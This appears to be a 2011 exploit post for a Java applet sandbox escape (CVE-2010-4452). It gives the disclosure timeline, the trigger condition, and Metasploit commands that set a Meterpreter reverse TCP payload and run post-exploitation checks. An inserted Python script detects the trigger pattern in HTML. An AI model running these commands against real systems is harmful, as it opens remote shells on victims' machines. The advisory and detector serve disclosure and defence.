Sunday, March 20, 2011

CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit


Timeline :

Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI on 2010-09-28
Coordinated public release of advisory on 2011-02-15
Vulnerability details publicly released by Frederic Hoguin on 2011-03-11
Metasploit PoC provided on 2011-03-15



PoC provided by :

Frederic Hoguin
jduck



Reference(s) :

CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle



Affected version(s) :

Oracle JRE 6 & JDK 6 Update 23 and before



Tested on Windows XP SP3 with :

Oracle JRE 6 Update 16


Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with:

1. a "codebase" parameter that points at a trusted directory, and
2. a "code" parameter that is a URL that does not contain any dots,

the applet will run outside of the sandbox.
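As an added defensive example (it is not part of the advisory or of the Metasploit module), the following Python script turns the trigger condition just described into a detection heuristic that can be run over HTML captured by a proxy or a sandbox: it flags <applet> and <object> invocations whose code parameter is a URL containing no dots and reports the accompanying codebase for review. The sample HTML, the EXAMPLE_TRUSTED_DIR placeholder and the function names are constructed for this example; which directories the JRE treats as trusted depends on the installation and is deliberately not hardcoded, so every hit needs an analyst to check the reported codebase.

```python
import re
from html.parser import HTMLParser

# Trigger condition taken from the module description: an applet whose "code"
# parameter is a URL containing no dots, combined with a "codebase" pointing
# at a directory the JRE trusts. The trusted-directory list is installation
# specific and is NOT encoded here (assumption: an analyst checks the reported
# codebase by hand), so the detector keys on the dotless-URL half of the
# condition and reports the codebase for review.

# A value "looks like a URL" if it starts with a scheme followed by "://".
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*://")


def is_dotless_url(value):
    """True when value is a URL (scheme://...) that contains no '.' at all."""
    return bool(value) and SCHEME_RE.match(value) is not None and "." not in value


class AppletCollector(HTMLParser):
    """Collects code/codebase values from <applet> attributes and from
    <param name="code|codebase"> children of <applet> or <object> elements."""

    def __init__(self):
        super().__init__()
        self.elements = []   # completed applet/object descriptions
        self._open = []      # applet/object elements whose end tag is pending

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}   # HTMLParser lowercases names
        if tag in ("applet", "object"):
            self._open.append({
                "tag": tag,
                "line": self.getpos()[0],
                "code": attrs.get("code"),
                "codebase": attrs.get("codebase"),
            })
        elif tag == "param" and self._open:
            name = attrs.get("name", "").lower()
            if name in ("code", "codebase"):
                # a <param> child overrides the attribute of the enclosing element
                self._open[-1][name] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag in ("applet", "object") and self._open:
            self.elements.append(self._open.pop())

    def close(self):
        super().close()
        while self._open:            # tolerate elements never closed
            self.elements.append(self._open.pop())


def find_suspicious_applets(html):
    """Return the applet/object elements matching the dotless-URL condition."""
    parser = AppletCollector()
    parser.feed(html)
    parser.close()
    return [
        {
            "line": e["line"],
            "tag": e["tag"],
            "code": e["code"],
            "codebase": e["codebase"],
            "reason": "code parameter is a dotless URL; verify whether codebase "
                      "is a JRE-trusted location",
        }
        for e in parser.elements
        if is_dotless_url(e["code"])
    ]


# Constructed sample page: one ordinary applet, then one <applet> and one
# <object> invocation that match the described pattern. EXAMPLE_TRUSTED_DIR
# is a placeholder, not a real JRE path.
SAMPLE_HTML = """<html><body>
<applet code="HelloWorld.class" codebase="/applets/" width="1" height="1"></applet>
<applet code="http://localhost/" codebase="file:///EXAMPLE_TRUSTED_DIR/" width="1" height="1"></applet>
<object type="application/x-java-applet" width="1" height="1">
  <param name="code" value="http://intranet-host/">
  <param name="codebase" value="file:///EXAMPLE_TRUSTED_DIR/">
</object>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_suspicious_applets(SAMPLE_HTML):
        print("line {line}: <{tag}> code={code!r} codebase={codebase!r}: {reason}"
              .format(**hit))
```

The heuristic only inspects <applet> and <object> elements; pages that launch applets through <embed> or through JavaScript-built tags would need the same check applied to the rendered DOM rather than the raw HTML, and a hit is a review item, not a verdict, until the codebase is compared against the directories the local JRE actually trusts.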



Commands :

use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid